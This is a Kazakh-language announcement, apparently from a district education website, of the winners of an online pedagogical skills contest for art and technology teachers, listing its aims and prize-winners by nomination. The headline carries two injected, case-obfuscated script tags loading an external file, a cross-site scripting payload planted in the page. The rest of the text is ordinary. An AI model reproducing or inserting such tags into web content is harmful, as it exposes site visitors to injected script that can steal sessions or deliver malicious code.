«Педагогикалық ізденіс» атты аудандық педагогикалық шеберлік онлайн байқауы аяқталды.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
04.03.2024
Байқаудың мақсаты – білім беру ұйымдары педагогтарының білім беру ортасын құру, ұлттық және жалпы адамзаттық құндылықтарға бағдарлана отырып, оқушылардың жеке тұлғасын қолайлы қалыптастыру және дамыту, сондай-ақ жаңа педагогикалық технологияларды енгізу бойынша кәсіби және шығармашылық қызметін дамыту.
Байқаудың тапсырмасы:
- «Көркем еңбек», «Технология» пәндерін оқытатын мұғалімдердің мәртебесі мен беделін арттыру;
- алдыңғы қатарлы педагогикалық тәжірибені тарату;
- мұғалімдердің көркемдік білім беру және технология саласындағы әдістемелік құзыреттерін кеңейтуге ынталандыру;
- бірлескен ғылыми-зерттеу жұмыстарына қатысу.
Байқау қорытындысы келесідей:
- «Авторлық жұмыс» номинациясы:
1 орын – А.А.Егорова (балалар мен жасөспірімдер шығармашылық орталығының мұғалімі).
- «Жоба қызметі» номинациясы:
1 орын - В.С. Пашкевич (Балкашино ауылының № 2 ЖОББМ мұғалімі)
- «Сабақты дамыту» номинациясы:
1 орын - А.Х. Абаева (Красная поляна ауылының ЖОББМ мұғалімі);
2 орын - А.А. Архипова (Лесное ауылының ЖОББМ мұғалімі);
3 орын - Н.М. Клименко (Каменка ауылының ЖОББМ мұғалімі)
- «Мұғалім шығармашылығы» номинациясы:
1 орын - Е.Г.Яковлев (Веселое ауылының ЖОББМ мұғалімі);
2 орын - М.В.Бальде (Балкашино ауылының № 1 ЖОББМ мұғалімі);
2 орын - Н.Г. Мицель (Ұлан ауылының НОББМ мұғалімі);
3 орын - А.И. Биемская (Мәдениет ауылының ЖОББМ мұғалімі);
3 орын - С.В. Мещерякова (Новоромановка ауылының ЖОББМ мұғалімі).